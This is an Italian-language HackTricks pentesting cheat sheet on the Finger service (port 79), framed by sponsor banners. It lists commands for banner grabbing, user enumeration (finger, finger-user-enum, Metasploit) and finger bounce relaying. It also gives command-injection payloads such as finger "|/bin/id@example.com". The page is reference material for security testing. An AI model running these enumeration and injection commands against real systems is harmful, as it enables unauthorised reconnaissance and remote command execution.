hacktricks/network-services-pentesting/pentesting-finger.md

5.1 KiB

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Setup immediatamente disponibile per la valutazione delle vulnerabilità e il penetration testing. Esegui un pentest completo da qualsiasi luogo con oltre 20 strumenti e funzionalità che vanno dalla ricognizione alla reportistica. Non sostituiamo i pentester - sviluppiamo strumenti personalizzati, moduli di rilevamento e sfruttamento per restituire loro del tempo per approfondire, aprire shell e divertirsi.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

Informazioni di base

Il programma/servizio Finger è utilizzato per recuperare dettagli sugli utenti del computer. Tipicamente, le informazioni fornite includono il nome utente, nome completo e, in alcuni casi, dettagli aggiuntivi. Questi dettagli extra potrebbero comprendere la posizione dell'ufficio e il numero di telefono (se disponibile), l'ora in cui l'utente ha effettuato l'accesso, il periodo di inattività (tempo di inattività), l'ultima volta che la posta è stata letta dall'utente e i contenuti dei file di piano e progetto dell'utente.

Porta predefinita: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumerazione

Acquisizione del banner/Connessione di base

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumerazione degli utenti

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

In alternativa, puoi utilizzare finger-user-enum da pentestmonkey, alcuni esempi:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap esegue uno script per utilizzare script predefiniti

Metasploit utilizza più trucchi di Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Esecuzione di comandi

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Usa un sistema come relay finger

finger user@host@victim
finger @internal@external

Impostazione disponibile istantaneamente per la valutazione delle vulnerabilità e il penetration testing. Esegui un pentest completo da qualsiasi luogo con oltre 20 strumenti e funzionalità che vanno dalla ricognizione alla reportistica. Non sostituiamo i pentester - sviluppiamo strumenti personalizzati, moduli di rilevamento e sfruttamento per dare loro un po' di tempo per approfondire, aprire shell e divertirsi.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %} Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks
{% endhint %}